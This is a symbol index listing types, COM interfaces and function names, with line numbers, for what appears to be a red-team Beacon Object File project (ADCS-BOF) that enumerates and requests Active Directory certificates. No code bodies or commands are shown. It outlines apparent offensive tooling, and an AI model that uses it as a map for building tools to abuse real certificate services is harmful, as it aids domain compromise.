type IX509MachineEnrollmentFactoryVtbl (line 22483) | typedef struct IX509MachineEnrollmentFactoryVtbl
function interface (line 22536) | interface IX509MachineEnrollmentFactory
type X509CertificateTemplateGeneralFlag (line 22590) | typedef
type X509CertificateTemplateEnrollmentFlag (line 22600) | typedef
type X509CertificateTemplateSubjectNameFlag (line 22620) | typedef
type X509CertificateTemplatePrivateKeyFlag (line 22637) | typedef
FILE: AD-BOF/ADCS-BOF/src/enum/entry.c
function VOID (line 11) | VOID go(
function main (line 41) | int main(int argc, char ** argv)
FILE: AD-BOF/ADCS-BOF/src/request/CertCli.h
type interface (line 44) | typedef interface ICertGetConfig
type interface (line 51) | typedef interface ICertConfig
type interface (line 58) | typedef interface ICertConfig2
type interface (line 65) | typedef interface ICertRequest
type interface (line 72) | typedef interface ICertRequest2
type interface (line 79) | typedef interface ICertRequest3
type class (line 88) | typedef class CCertGetConfig
type CCertGetConfig (line 90) | typedef struct CCertGetConfig CCertGetConfig;
type class (line 100) | typedef class CCertConfig
type CCertConfig (line 102) | typedef struct CCertConfig CCertConfig;
type class (line 112) | typedef class CCertRequest
type CCertRequest (line 114) | typedef struct CCertRequest CCertRequest;
type class (line 124) | typedef class CCertServerPolicy
type CCertServerPolicy (line 126) | typedef struct CCertServerPolicy CCertServerPolicy;
type class (line 136) | typedef class CCertServerExit
type CCertServerExit (line 138) | typedef struct CCertServerExit CCertServerExit;
type ICertGetConfigVtbl (line 188) | typedef struct ICertGetConfigVtbl
function interface (line 249) | interface ICertGetConfig
type ICertConfigVtbl (line 331) | typedef struct ICertConfigVtbl
function interface (line 406) | interface ICertConfig
type ICertConfig2Vtbl (line 485) | typedef struct ICertConfig2Vtbl
function interface (line 564) | interface ICertConfig2
type ICertRequestVtbl (line 675) | typedef struct ICertRequestVtbl
function interface (line 769) | interface ICertRequest
type ICertRequest2Vtbl (line 890) | typedef struct ICertRequest2Vtbl
function interface (line 1026) | interface ICertRequest2
type X509EnrollmentAuthFlags (line 1113) | typedef
type ICertRequest3Vtbl (line 1166) | typedef struct ICertRequest3Vtbl
function interface (line 1324) | interface ICertRequest3
FILE: AD-BOF/ADCS-BOF/src/request/CertPol.h
type interface (line 44) | typedef interface ICertPolicy
type interface (line 51) | typedef interface ICertPolicy2
type interface (line 58) | typedef interface INDESPolicy
type ICertPolicyVtbl (line 120) | typedef struct ICertPolicyVtbl
function interface (line 195) | interface ICertPolicy
type ICertPolicy2Vtbl (line 274) | typedef struct ICertPolicy2Vtbl
function interface (line 353) | interface ICertPolicy2
type X509SCEPMessageType (line 416) | typedef
type X509SCEPDisposition (line 428) | typedef
type X509SCEPFailInfo (line 438) | typedef
type INDESPolicyVtbl (line 497) | typedef struct INDESPolicyVtbl
function interface (line 544) | interface INDESPolicy
FILE: AD-BOF/ADCS-BOF/src/request/adcs_request.c
type BSTR (line 11) | typedef BSTR WINAPI (*SysAllocString_t)(const OLECHAR *);
type UINT (line 12) | typedef UINT WINAPI (*SysStringLen_t)(BSTR);
type HRESULT (line 19) | typedef HRESULT WINAPI (*CoInitializeEx_t)(LPVOID pvReserved, DWORD dwCo...
type HRESULT (line 20) | typedef HRESULT WINAPI (*CoUninitialize_t)(void);
function HRESULT (line 90) | HRESULT _adcs_request_CreatePrivateKey(BOOL bMachine, IX509PrivateKey **...
function HRESULT (line 137) | HRESULT _adcs_request_CreateCertRequest(BOOL bMachine, IX509PrivateKey *...
function HRESULT (line 403) | HRESULT _adcs_request_CreateEnrollment(IX509CertificateRequestPkcs10V3 *...
function HRESULT (line 445) | HRESULT _adcs_request_SubmitEnrollment(IX509Enrollment * pEnrollment, BS...
function HRESULT (line 531) | HRESULT adcs_request(LPCWSTR lpswzCA, LPCWSTR lpswzTemplate, LPCWSTR lps...
FILE: AD-BOF/ADCS-BOF/src/request/base.c
function bofstart (line 25) | int bofstart()
function internal_printf (line 36) | void internal_printf(const char* format, ...){
function printoutput (line 83) | void printoutput(BOOL done)
type loadedLibrary (line 96) | typedef struct loadedLibrary {
function BOOL (line 103) | BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
function FARPROC (line 131) | FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
function wchar_t (line 207) | wchar_t* Utf8ToUtf16(const char* input)
function DWORD (line 247) | DWORD SetPrivilege(
function bofstop (line 322) | void bofstop()
FILE: AD-BOF/ADCS-BOF/src/request/certca.h
type VOID (line 32) | typedef VOID * HCAINFO;
type VOID (line 34) | typedef VOID * HCERTTYPE;
type VOID (line 36) | typedef VOID * HCERTTYPEQUERY;
type CERTSERVERENROLL (line 3037) | typedef struct _CERTSERVERENROLL
type ENUM_PERIOD (line 3082) | enum ENUM_PERIOD
type PERIODUNITS (line 3094) | typedef struct _PERIODUNITS
FILE: AD-BOF/ADCS-BOF/src/request/certenroll.h
type interface (line 44) | typedef interface IObjectId IObjectId;
type interface (line 51) | typedef interface IObjectIds
type interface (line 58) | typedef interface IBinaryConverter
type interface (line 65) | typedef interface IBinaryConverter2
type interface (line 72) | typedef interface IX500DistinguishedName
type interface (line 79) | typedef interface IX509EnrollmentStatus
type interface (line 86) | typedef interface ICspAlgorithm
type interface (line 93) | typedef interface ICspAlgorithms
type interface (line 100) | typedef interface ICspInformation
type interface (line 107) | typedef interface ICspInformations
type interface (line 114) | typedef interface ICspStatus
type interface (line 121) | typedef interface ICspStatuses
type interface (line 128) | typedef interface IX509PublicKey
type interface (line 135) | typedef interface IX509PrivateKey
type interface (line 142) | typedef interface IX509PrivateKey2
type interface (line 149) | typedef interface IX509EndorsementKey
type interface (line 156) | typedef interface IX509Extension
type interface (line 163) | typedef interface IX509Extensions
type interface (line 170) | typedef interface IX509ExtensionKeyUsage
type interface (line 177) | typedef interface IX509ExtensionEnhancedKeyUsage
type interface (line 184) | typedef interface IX509ExtensionTemplateName
type interface (line 191) | typedef interface IX509ExtensionTemplate
type interface (line 198) | typedef interface IAlternativeName
type interface (line 205) | typedef interface IAlternativeNames
type interface (line 212) | typedef interface IX509ExtensionAlternativeNames
type interface (line 219) | typedef interface IX509ExtensionBasicConstraints
type interface (line 226) | typedef interface IX509ExtensionSubjectKeyIdentifier
type interface (line 233) | typedef interface IX509ExtensionAuthorityKeyIdentifier
type interface (line 240) | typedef interface ISmimeCapability
type interface (line 247) | typedef interface ISmimeCapabilities
type interface (line 254) | typedef interface IX509ExtensionSmimeCapabilities
type interface (line 261) | typedef interface IPolicyQualifier
type interface (line 268) | typedef interface IPolicyQualifiers
type interface (line 275) | typedef interface ICertificatePolicy
type interface (line 282) | typedef interface ICertificatePolicies
type interface (line 289) | typedef interface IX509ExtensionCertificatePolicies
type interface (line 296) | typedef interface IX509ExtensionMSApplicationPolicies
type interface (line 303) | typedef interface IX509Attribute
type interface (line 310) | typedef interface IX509Attributes
type interface (line 317) | typedef interface IX509AttributeExtensions
type interface (line 324) | typedef interface IX509AttributeClientId
type interface (line 331) | typedef interface IX509AttributeRenewalCertificate
type interface (line 338) | typedef interface IX509AttributeArchiveKey
type interface (line 345) | typedef interface IX509AttributeArchiveKeyHash
type interface (line 352) | typedef interface IX509AttributeOSVersion
type interface (line 359) | typedef interface IX509AttributeCspProvider
type interface (line 366) | typedef interface ICryptAttribute
type interface (line 373) | typedef interface ICryptAttributes
type interface (line 380) | typedef interface ICertProperty
type interface (line 387) | typedef interface ICertProperties
type interface (line 394) | typedef interface ICertPropertyFriendlyName
type interface (line 401) | typedef interface ICertPropertyDescription
type interface (line 408) | typedef interface ICertPropertyAutoEnroll
type interface (line 415) | typedef interface ICertPropertyRequestOriginator
type interface (line 422) | typedef interface ICertPropertySHA1Hash
type interface (line 429) | typedef interface ICertPropertyKeyProvInfo
type interface (line 436) | typedef interface ICertPropertyArchived
type interface (line 443) | typedef interface ICertPropertyBackedUp
type interface (line 450) | typedef interface ICertPropertyEnrollment
type interface (line 457) | typedef interface ICertPropertyRenewal
type interface (line 464) | typedef interface ICertPropertyArchivedKeyHash
type interface (line 471) | typedef interface ICertPropertyEnrollmentPolicyServer
type interface (line 478) | typedef interface IX509SignatureInformation
type interface (line 485) | typedef interface ISignerCertificate
type interface (line 492) | typedef interface ISignerCertificates
type interface (line 499) | typedef interface IX509NameValuePair
type interface (line 506) | typedef interface IX509NameValuePairs
type interface (line 513) | typedef interface IX509CertificateTemplate
type interface (line 520) | typedef interface IX509CertificateTemplates
type interface (line 527) | typedef interface IX509CertificateTemplateWritable
type interface (line 534) | typedef interface ICertificationAuthority
type interface (line 541) | typedef interface ICertificationAuthorities
type interface (line 548) | typedef interface IX509EnrollmentPolicyServer
type interface (line 555) | typedef interface IX509PolicyServerUrl
type interface (line 562) | typedef interface IX509PolicyServerListManager
type interface (line 569) | typedef interface IX509CertificateRequest
type interface (line 576) | typedef interface IX509CertificateRequestPkcs10
type interface (line 583) | typedef interface IX509CertificateRequestPkcs10V2
type interface (line 590) | typedef interface IX509CertificateRequestPkcs10V3
type interface (line 597) | typedef interface IX509CertificateRequestPkcs10V4
type interface (line 604) | typedef interface IX509CertificateRequestCertificate
type interface (line 611) | typedef interface IX509CertificateRequestCertificate2
type interface (line 618) | typedef interface IX509CertificateRequestPkcs7
type interface (line 625) | typedef interface IX509CertificateRequestPkcs7V2
type interface (line 632) | typedef interface IX509CertificateRequestCmc
type interface (line 639) | typedef interface IX509CertificateRequestCmc2
type interface (line 646) | typedef interface IX509Enrollment
type interface (line 653) | typedef interface IX509Enrollment2
type interface (line 660) | typedef interface IX509EnrollmentHelper
type interface (line 667) | typedef interface IX509EnrollmentWebClassFactory
type interface (line 674) | typedef interface IX509MachineEnrollmentFactory
type interface (line 681) | typedef interface IX509CertificateRevocationListEntry
type interface (line 688) | typedef interface IX509CertificateRevocationListEntries
type interface (line 695) | typedef interface IX509CertificateRevocationList
type interface (line 702) | typedef interface ICertificateAttestationChallenge
type interface (line 709) | typedef interface ICertificateAttestationChallenge2
type interface (line 716) | typedef interface IX509SCEPEnrollment
type interface (line 723) | typedef interface IX509SCEPEnrollment2
type interface (line 730) | typedef interface IX509SCEPEnrollmentHelper
type class (line 739) | typedef class CObjectId CObjectId;
type CObjectId (line 741) | typedef struct CObjectId CObjectId;
type class (line 751) | typedef class CObjectIds CObjectIds;
type CObjectIds (line 753) | typedef struct CObjectIds CObjectIds;
type class (line 763) | typedef class CBinaryConverter
type CBinaryConverter (line 765) | typedef struct CBinaryConverter CBinaryConverter;
type class (line 775) | typedef class CX500DistinguishedName
type CX500DistinguishedName (line 777) | typedef struct CX500DistinguishedName CX500DistinguishedName;
type class (line 787) | typedef class CCspInformation
type CCspInformation (line 789) | typedef struct CCspInformation CCspInformation;
type class (line 799) | typedef class CCspInformations
type CCspInformations (line 801) | typedef struct CCspInformations CCspInformations;
type class (line 811) | typedef class CCspStatus CCspStatus;
type CCspStatus (line 813) | typedef struct CCspStatus CCspStatus;
type class (line 823) | typedef class CX509PublicKey
type CX509PublicKey (line 825) | typedef struct CX509PublicKey CX509PublicKey;
type class (line 835) | typedef class CX509PrivateKey
type CX509PrivateKey (line 837) | typedef struct CX509PrivateKey CX509PrivateKey;
type class (line 847) | typedef class CX509EndorsementKey
type CX509EndorsementKey (line 849) | typedef struct CX509EndorsementKey CX509EndorsementKey;
type class (line 859) | typedef class CX509Extension
type CX509Extension (line 861) | typedef struct CX509Extension CX509Extension;
type class (line 871) | typedef class CX509Extensions
type CX509Extensions (line 873) | typedef struct CX509Extensions CX509Extensions;
type class (line 883) | typedef class CX509ExtensionKeyUsage
type CX509ExtensionKeyUsage (line 885) | typedef struct CX509ExtensionKeyUsage CX509ExtensionKeyUsage;
type class (line 895) | typedef class CX509ExtensionEnhancedKeyUsage
type CX509ExtensionEnhancedKeyUsage (line 897) | typedef struct CX509ExtensionEnhancedKeyUsage CX509ExtensionEnhancedKeyU...
type class (line 907) | typedef class CX509ExtensionTemplateName
type CX509ExtensionTemplateName (line 909) | typedef struct CX509ExtensionTemplateName CX509ExtensionTemplateName;
type class (line 919) | typedef class CX509ExtensionTemplate
type CX509ExtensionTemplate (line 921) | typedef struct CX509ExtensionTemplate CX509ExtensionTemplate;
type class (line 931) | typedef class CAlternativeName
type CAlternativeName (line 933) | typedef struct CAlternativeName CAlternativeName;
type class (line 943) | typedef class CAlternativeNames
type CAlternativeNames (line 945) | typedef struct CAlternativeNames CAlternativeNames;
type class (line 955) | typedef class CX509ExtensionAlternativeNames
type CX509ExtensionAlternativeNames (line 957) | typedef struct CX509ExtensionAlternativeNames CX509ExtensionAlternativeN...
type class (line 967) | typedef class CX509ExtensionBasicConstraints
type CX509ExtensionBasicConstraints (line 969) | typedef struct CX509ExtensionBasicConstraints CX509ExtensionBasicConstra...
type class (line 979) | typedef class CX509ExtensionSubjectKeyIdentifier
type CX509ExtensionSubjectKeyIdentifier (line 981) | typedef struct CX509ExtensionSubjectKeyIdentifier CX509ExtensionSubjectK...
type class (line 991) | typedef class CX509ExtensionAuthorityKeyIdentifier
type CX509ExtensionAuthorityKeyIdentifier (line 993) | typedef struct CX509ExtensionAuthorityKeyIdentifier CX509ExtensionAuthor...
type class (line 1003) | typedef class CSmimeCapability
type CSmimeCapability (line 1005) | typedef struct CSmimeCapability CSmimeCapability;
type class (line 1015) | typedef class CSmimeCapabilities
type CSmimeCapabilities (line 1017) | typedef struct CSmimeCapabilities CSmimeCapabilities;
type class (line 1027) | typedef class CX509ExtensionSmimeCapabilities
type CX509ExtensionSmimeCapabilities (line 1029) | typedef struct CX509ExtensionSmimeCapabilities CX509ExtensionSmimeCapabi...
type class (line 1039) | typedef class CPolicyQualifier
type CPolicyQualifier (line 1041) | typedef struct CPolicyQualifier CPolicyQualifier;
type class (line 1051) | typedef class CPolicyQualifiers
type CPolicyQualifiers (line 1053) | typedef struct CPolicyQualifiers CPolicyQualifiers;
type class (line 1063) | typedef class CCertificatePolicy
type CCertificatePolicy (line 1065) | typedef struct CCertificatePolicy CCertificatePolicy;
type class (line 1075) | typedef class CCertificatePolicies
type CCertificatePolicies (line 1077) | typedef struct CCertificatePolicies CCertificatePolicies;
type class (line 1087) | typedef class CX509ExtensionCertificatePolicies
type CX509ExtensionCertificatePolicies (line 1089) | typedef struct CX509ExtensionCertificatePolicies CX509ExtensionCertifica...
type class (line 1099) | typedef class CX509ExtensionMSApplicationPolicies
type CX509ExtensionMSApplicationPolicies (line 1101) | typedef struct CX509ExtensionMSApplicationPolicies CX509ExtensionMSAppli...
type class (line 1111) | typedef class CX509Attribute
type CX509Attribute (line 1113) | typedef struct CX509Attribute CX509Attribute;
type class (line 1123) | typedef class CX509Attributes
type CX509Attributes (line 1125) | typedef struct CX509Attributes CX509Attributes;
type class (line 1135) | typedef class CX509AttributeExtensions
type CX509AttributeExtensions (line 1137) | typedef struct CX509AttributeExtensions CX509AttributeExtensions;
type class (line 1147) | typedef class CX509AttributeClientId
type CX509AttributeClientId (line 1149) | typedef struct CX509AttributeClientId CX509AttributeClientId;
type class (line 1159) | typedef class CX509AttributeRenewalCertificate
type CX509AttributeRenewalCertificate (line 1161) | typedef struct CX509AttributeRenewalCertificate CX509AttributeRenewalCer...
type class (line 1171) | typedef class CX509AttributeArchiveKey
type CX509AttributeArchiveKey (line 1173) | typedef struct CX509AttributeArchiveKey CX509AttributeArchiveKey;
type class (line 1183) | typedef class CX509AttributeArchiveKeyHash
type CX509AttributeArchiveKeyHash (line 1185) | typedef struct CX509AttributeArchiveKeyHash CX509AttributeArchiveKeyHash;
type class (line 1195) | typedef class CX509AttributeOSVersion
type CX509AttributeOSVersion (line 1197) | typedef struct CX509AttributeOSVersion CX509AttributeOSVersion;
type class (line 1207) | typedef class CX509AttributeCspProvider
type CX509AttributeCspProvider (line 1209) | typedef struct CX509AttributeCspProvider CX509AttributeCspProvider;
type class (line 1219) | typedef class CCryptAttribute
type CCryptAttribute (line 1221) | typedef struct CCryptAttribute CCryptAttribute;
type class (line 1231) | typedef class CCryptAttributes
type CCryptAttributes (line 1233) | typedef struct CCryptAttributes CCryptAttributes;
type class (line 1243) | typedef class CCertProperty
type CCertProperty (line 1245) | typedef struct CCertProperty CCertProperty;
type class (line 1255) | typedef class CCertProperties
type CCertProperties (line 1257) | typedef struct CCertProperties CCertProperties;
type class (line 1267) | typedef class CCertPropertyFriendlyName
type CCertPropertyFriendlyName (line 1269) | typedef struct CCertPropertyFriendlyName CCertPropertyFriendlyName;
type class (line 1279) | typedef class CCertPropertyDescription
type CCertPropertyDescription (line 1281) | typedef struct CCertPropertyDescription CCertPropertyDescription;
type class (line 1291) | typedef class CCertPropertyAutoEnroll
type CCertPropertyAutoEnroll (line 1293) | typedef struct CCertPropertyAutoEnroll CCertPropertyAutoEnroll;
type class (line 1303) | typedef class CCertPropertyRequestOriginator
type CCertPropertyRequestOriginator (line 1305) | typedef struct CCertPropertyRequestOriginator CCertPropertyRequestOrigin...
type class (line 1315) | typedef class CCertPropertySHA1Hash
type CCertPropertySHA1Hash (line 1317) | typedef struct CCertPropertySHA1Hash CCertPropertySHA1Hash;
type class (line 1327) | typedef class CCertPropertyKeyProvInfo
type CCertPropertyKeyProvInfo (line 1329) | typedef struct CCertPropertyKeyProvInfo CCertPropertyKeyProvInfo;
type class (line 1339) | typedef class CCertPropertyArchived
type CCertPropertyArchived (line 1341) | typedef struct CCertPropertyArchived CCertPropertyArchived;
type class (line 1351) | typedef class CCertPropertyBackedUp
type CCertPropertyBackedUp (line 1353) | typedef struct CCertPropertyBackedUp CCertPropertyBackedUp;
type class (line 1363) | typedef class CCertPropertyEnrollment
type CCertPropertyEnrollment (line 1365) | typedef struct CCertPropertyEnrollment CCertPropertyEnrollment;
type class (line 1375) | typedef class CCertPropertyRenewal
type CCertPropertyRenewal (line 1377) | typedef struct CCertPropertyRenewal CCertPropertyRenewal;
type class (line 1387) | typedef class CCertPropertyArchivedKeyHash
type CCertPropertyArchivedKeyHash (line 1389) | typedef struct CCertPropertyArchivedKeyHash CCertPropertyArchivedKeyHash;
type class (line 1399) | typedef class CCertPropertyEnrollmentPolicyServer
type CCertPropertyEnrollmentPolicyServer (line 1401) | typedef struct CCertPropertyEnrollmentPolicyServer CCertPropertyEnrollme...
type class (line 1411) | typedef class CSignerCertificate
type CSignerCertificate (line 1413) | typedef struct CSignerCertificate CSignerCertificate;
type class (line 1423) | typedef class CX509NameValuePair
type CX509NameValuePair (line 1425) | typedef struct CX509NameValuePair CX509NameValuePair;
type class (line 1435) | typedef class CCertificateAttestationChallenge
type CCertificateAttestationChallenge (line 1437) | typedef struct CCertificateAttestationChallenge CCertificateAttestationC...
type class (line 1447) | typedef class CX509CertificateRequestPkcs10
type CX509CertificateRequestPkcs10 (line 1449) | typedef struct CX509CertificateRequestPkcs10 CX509CertificateRequestPkcs10;
type class (line 1459) | typedef class CX509CertificateRequestCertificate
type CX509CertificateRequestCertificate (line 1461) | typedef struct CX509CertificateRequestCertificate CX509CertificateReques...
type class (line 1471) | typedef class CX509CertificateRequestPkcs7
type CX509CertificateRequestPkcs7 (line 1473) | typedef struct CX509CertificateRequestPkcs7 CX509CertificateRequestPkcs7;
type class (line 1483) | typedef class CX509CertificateRequestCmc
type CX509CertificateRequestCmc (line 1485) | typedef struct CX509CertificateRequestCmc CX509CertificateRequestCmc;
type class (line 1495) | typedef class CX509Enrollment
type CX509Enrollment (line 1497) | typedef struct CX509Enrollment CX509Enrollment;
type class (line 1507) | typedef class CX509EnrollmentWebClassFactory
type CX509EnrollmentWebClassFactory (line 1509) | typedef struct CX509EnrollmentWebClassFactory CX509EnrollmentWebClassFac...
type class (line 1519) | typedef class CX509EnrollmentHelper
type CX509EnrollmentHelper (line 1521) | typedef struct CX509EnrollmentHelper CX509EnrollmentHelper;
type class (line 1531) | typedef class CX509MachineEnrollmentFactory
type CX509MachineEnrollmentFactory (line 1533) | typedef struct CX509MachineEnrollmentFactory CX509MachineEnrollmentFactory;
type class (line 1543) | typedef class CX509EnrollmentPolicyActiveDirectory
type CX509EnrollmentPolicyActiveDirectory (line 1545) | typedef struct CX509EnrollmentPolicyActiveDirectory CX509EnrollmentPolic...
type class (line 1555) | typedef class CX509EnrollmentPolicyWebService
type CX509EnrollmentPolicyWebService (line 1557) | typedef struct CX509EnrollmentPolicyWebService CX509EnrollmentPolicyWebS...
type class (line 1567) | typedef class CX509PolicyServerListManager
type CX509PolicyServerListManager (line 1569) | typedef struct CX509PolicyServerListManager CX509PolicyServerListManager;
type class (line 1579) | typedef class CX509PolicyServerUrl
type CX509PolicyServerUrl (line 1581) | typedef struct CX509PolicyServerUrl CX509PolicyServerUrl;
type class (line 1591) | typedef class CX509CertificateTemplateADWritable
type CX509CertificateTemplateADWritable (line 1593) | typedef struct CX509CertificateTemplateADWritable CX509CertificateTempla...
type class (line 1603) | typedef class CX509CertificateRevocationListEntry
type CX509CertificateRevocationListEntry (line 1605) | typedef struct CX509CertificateRevocationListEntry CX509CertificateRevoc...
type class (line 1615) | typedef class CX509CertificateRevocationListEntries
type CX509CertificateRevocationListEntries (line 1617) | typedef struct CX509CertificateRevocationListEntries CX509CertificateRev...
type class (line 1627) | typedef class CX509CertificateRevocationList
type CX509CertificateRevocationList (line 1629) | typedef struct CX509CertificateRevocationList CX509CertificateRevocation...
type class (line 1639) | typedef class CX509SCEPEnrollment
type CX509SCEPEnrollment (line 1641) | typedef struct CX509SCEPEnrollment CX509SCEPEnrollment;
type class (line 1651) | typedef class CX509SCEPEnrollmentHelper
type CX509SCEPEnrollmentHelper (line 1653) | typedef struct CX509SCEPEnrollmentHelper CX509SCEPEnrollmentHelper;
type typedef (line 1677) | typedef typedef void VOID;
type CERTENROLL_OBJECTID (line 1681) | typedef
type WebSecurityLevel (line 2124) | typedef
type EncodingType (line 2133) | typedef
type PFXExportOptions (line 2160) | typedef
type ObjectIdGroupId (line 2168) | typedef
type ObjectIdPublicKeyFlags (line 2192) | typedef
type AlgorithmFlags (line 2200) | typedef
type IObjectIdVtbl (line 2261) | typedef struct IObjectIdVtbl
function interface (line 2354) | interface IObjectId
type IObjectIdsVtbl (line 2463) | typedef struct IObjectIdsVtbl
function interface (line 2547) | interface IObjectIds
type IBinaryConverterVtbl (line 2648) | typedef struct IBinaryConverterVtbl
function interface (line 2723) | interface IBinaryConverter
type IBinaryConverter2Vtbl (line 2804) | typedef struct IBinaryConverter2Vtbl
function interface (line 2889) | interface IBinaryConverter2
type X500NameFlags (line 2952) | typedef
type IX500DistinguishedNameVtbl (line 3018) | typedef struct IX500DistinguishedNameVtbl
function interface (line 3094) | interface IX500DistinguishedName
type X509CertificateEnrollmentContext (line 3153) | typedef
type EnrollmentEnrollStatus (line 3162) | typedef
type EnrollmentSelectionStatus (line 3174) | typedef
type EnrollmentDisplayStatus (line 3181) | typedef
type IX509EnrollmentStatusVtbl (line 3249) | typedef struct IX509EnrollmentStatusVtbl
function interface (line 3353) | interface IX509EnrollmentStatus
type X509ProviderType (line 3436) | typedef
type AlgorithmType (line 3466) | typedef
type AlgorithmOperationFlags (line 3478) | typedef
type ICspAlgorithmVtbl (line 3552) | typedef struct ICspAlgorithmVtbl
function interface (line 3650) | interface ICspAlgorithm
type ICspAlgorithmsVtbl (line 3770) | typedef struct ICspAlgorithmsVtbl
function interface (line 3860) | interface ICspAlgorithms
type X509KeySpec (line 3931) | typedef
type ICspInformationVtbl (line 4022) | typedef struct ICspInformationVtbl
function interface (line 4151) | interface ICspInformation
type ICspInformationsVtbl (line 4308) | typedef struct ICspInformationsVtbl
function interface (line 4418) | interface ICspInformations
type ICspStatusVtbl (line 4540) | typedef struct ICspStatusVtbl
function interface (line 4625) | interface ICspStatus
type ICspStatusesVtbl (line 4747) | typedef struct ICspStatusesVtbl
function interface (line 4850) | interface ICspStatuses
type KeyIdentifierHashAlgorithm (line 4927) | typedef
type IX509PublicKeyVtbl (line 4991) | typedef struct IX509PublicKeyVtbl
function interface (line 5083) | interface IX509PublicKey
type X509PrivateKeyExportFlags (line 5151) | typedef
type X509PrivateKeyUsageFlags (line 5161) | typedef
type X509PrivateKeyProtection (line 5171) | typedef
type X509PrivateKeyVerify (line 5181) | typedef
type IX509PrivateKeyVtbl (line 5392) | typedef struct IX509PrivateKeyVtbl
function interface (line 5682) | interface IX509PrivateKey
type X509HardwareKeyUsageFlags (line 5903) | typedef
type X509KeyParametersExportType (line 5915) | typedef
type IX509PrivateKey2Vtbl (line 5980) | typedef struct IX509PrivateKey2Vtbl
function interface (line 6312) | interface IX509PrivateKey2
type IX509EndorsementKeyVtbl (line 6618) | typedef struct IX509EndorsementKeyVtbl
function interface (line 6722) | interface IX509EndorsementKey
type IX509ExtensionVtbl (line 6837) | typedef struct IX509ExtensionVtbl
function interface (line 6916) | interface IX509Extension
type IX509ExtensionsVtbl (line 7020) | typedef struct IX509ExtensionsVtbl
function interface (line 7109) | interface IX509Extensions
type X509KeyUsageFlags (line 7180) | typedef
type IX509ExtensionKeyUsageVtbl (line 7231) | typedef struct IX509ExtensionKeyUsageVtbl
function interface (line 7323) | interface IX509ExtensionKeyUsage
type IX509ExtensionEnhancedKeyUsageVtbl (line 7422) | typedef struct IX509ExtensionEnhancedKeyUsageVtbl
function interface (line 7514) | interface IX509ExtensionEnhancedKeyUsage
type IX509ExtensionTemplateNameVtbl (line 7613) | typedef struct IX509ExtensionTemplateNameVtbl
function interface (line 7705) | interface IX509ExtensionTemplateName
type IX509ExtensionTemplateVtbl (line 7812) | typedef struct IX509ExtensionTemplateVtbl
function interface (line 7914) | interface IX509ExtensionTemplate
type AlternativeNameType (line 7992) | typedef
type IAlternativeNameVtbl (line 8060) | typedef struct IAlternativeNameVtbl
function interface (line 8151) | interface IAlternativeName
type IAlternativeNamesVtbl (line 8254) | typedef struct IAlternativeNamesVtbl
function interface (line 8334) | interface IAlternativeNames
type IX509ExtensionAlternativeNamesVtbl (line 8426) | typedef struct IX509ExtensionAlternativeNamesVtbl
function interface (line 8518) | interface IX509ExtensionAlternativeNames
type IX509ExtensionBasicConstraintsVtbl (line 8621) | typedef struct IX509ExtensionBasicConstraintsVtbl
function interface (line 8718) | interface IX509ExtensionBasicConstraints
type IX509ExtensionSubjectKeyIdentifierVtbl (line 8822) | typedef struct IX509ExtensionSubjectKeyIdentifierVtbl
function interface (line 8916) | interface IX509ExtensionSubjectKeyIdentifier
type IX509ExtensionAuthorityKeyIdentifierVtbl (line 9017) | typedef struct IX509ExtensionAuthorityKeyIdentifierVtbl
function interface (line 9111) | interface IX509ExtensionAuthorityKeyIdentifier
type ISmimeCapabilityVtbl (line 9210) | typedef struct ISmimeCapabilityVtbl
function interface (line 9279) | interface ISmimeCapability
type ISmimeCapabilitiesVtbl (line 9376) | typedef struct ISmimeCapabilitiesVtbl
function interface (line 9464) | interface ISmimeCapabilities
type IX509ExtensionSmimeCapabilitiesVtbl (line 9562) | typedef struct IX509ExtensionSmimeCapabilitiesVtbl
function interface (line 9654) | interface IX509ExtensionSmimeCapabilities
type PolicyQualifierType (line 9726) | typedef
type IPolicyQualifierVtbl (line 9777) | typedef struct IPolicyQualifierVtbl
function interface (line 9855) | interface IPolicyQualifier
type IPolicyQualifiersVtbl (line 9952) | typedef struct IPolicyQualifiersVtbl
function interface (line 10032) | interface IPolicyQualifiers
type ICertificatePolicyVtbl (line 10123) | typedef struct ICertificatePolicyVtbl
function interface (line 10191) | interface ICertificatePolicy
type ICertificatePoliciesVtbl (line 10282) | typedef struct ICertificatePoliciesVtbl
function interface (line 10362) | interface ICertificatePolicies
type IX509ExtensionCertificatePoliciesVtbl (line 10454) | typedef struct IX509ExtensionCertificatePoliciesVtbl
function interface (line 10546) | interface IX509ExtensionCertificatePolicies
type IX509ExtensionMSApplicationPoliciesVtbl (line 10645) | typedef struct IX509ExtensionMSApplicationPoliciesVtbl
function interface (line 10737) | interface IX509ExtensionMSApplicationPolicies
type IX509AttributeVtbl (line 10838) | typedef struct IX509AttributeVtbl
function interface (line 10909) | interface IX509Attribute
type IX509AttributesVtbl (line 11000) | typedef struct IX509AttributesVtbl
function interface (line 11080) | interface IX509Attributes
type IX509AttributeExtensionsVtbl (line 11172) | typedef struct IX509AttributeExtensionsVtbl
function interface (line 11256) | interface IX509AttributeExtensions
type RequestClientInfoClientId (line 11322) | typedef
type IX509AttributeClientIdVtbl (line 11387) | typedef struct IX509AttributeClientIdVtbl
function interface (line 11486) | interface IX509AttributeClientId
type IX509AttributeRenewalCertificateVtbl (line 11590) | typedef struct IX509AttributeRenewalCertificateVtbl
function interface (line 11676) | interface IX509AttributeRenewalCertificate
type IX509AttributeArchiveKeyVtbl (line 11780) | typedef struct IX509AttributeArchiveKeyVtbl
function interface (line 11877) | interface IX509AttributeArchiveKey
type IX509AttributeArchiveKeyHashVtbl (line 11978) | typedef struct IX509AttributeArchiveKeyHashVtbl
function interface (line 12064) | interface IX509AttributeArchiveKeyHash
type IX509AttributeOSVersionVtbl (line 12157) | typedef struct IX509AttributeOSVersionVtbl
function interface (line 12241) | interface IX509AttributeOSVersion
type IX509AttributeCspProviderVtbl (line 12344) | typedef struct IX509AttributeCspProviderVtbl
function interface (line 12440) | interface IX509AttributeCspProvider
type ICryptAttributeVtbl (line 12541) | typedef struct ICryptAttributeVtbl
function interface (line 12613) | interface ICryptAttribute
type ICryptAttributesVtbl (line 12714) | typedef struct ICryptAttributesVtbl
function interface (line 12803) | interface ICryptAttributes
type CERTENROLL_PROPERTYID (line 12874) | typedef
type ICertPropertyVtbl (line 13033) | typedef struct ICertPropertyVtbl
function interface (line 13125) | interface ICertProperty
type ICertPropertiesVtbl (line 13233) | typedef struct ICertPropertiesVtbl
function interface (line 13319) | interface ICertProperties
type ICertPropertyFriendlyNameVtbl (line 13410) | typedef struct ICertPropertyFriendlyNameVtbl
function interface (line 13510) | interface ICertPropertyFriendlyName
